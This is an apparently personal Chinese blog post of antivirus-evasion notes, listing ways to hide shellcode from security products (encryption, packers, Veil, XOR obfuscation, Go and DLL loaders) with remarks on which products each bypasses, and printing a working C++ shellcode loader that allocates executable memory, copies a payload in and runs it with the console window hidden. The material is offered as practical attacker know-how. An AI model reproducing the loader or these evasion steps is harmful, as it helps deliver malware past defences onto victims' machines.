免杀笔记

免杀

1 shellcode加密

  • 通过python脚本加密,64位
  • 加一个c++加载器,通过mingw编译
  • 需要专门的解码工具,代码写的比较复杂(文件多),不容易移植
  • 经测试,可以过除卡巴外的杀软
  • 网址:https://github.com/ORCA666/EVA2

2 Pyinstall打包

  • 可免杀,但不能上线

3 加壳

  • UPX不行
  • ASP加壳可以过Avast,但不能过Symantic

4 veil + mingw-w64

5 powershell加密免杀

6 shellcode加载混淆

shellcode异或和加字节

7 dll免杀

8 go免杀

9 工具免杀

10 在线免杀平台

11 shellcode加载器

c++加载器

#include <Windows.h>
#include <stdio.h>
using namespace std;
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")

int main(int argc, char** argv) {
    unsigned char ShellCode[] = " ";
    void* exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, ShellCode, sizeof ShellCode);
	((void(*)())exec)();
	return 0;
}

7 其它

posted @   z5onk0  阅读(80)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
点击右上角即可分享
微信分享提示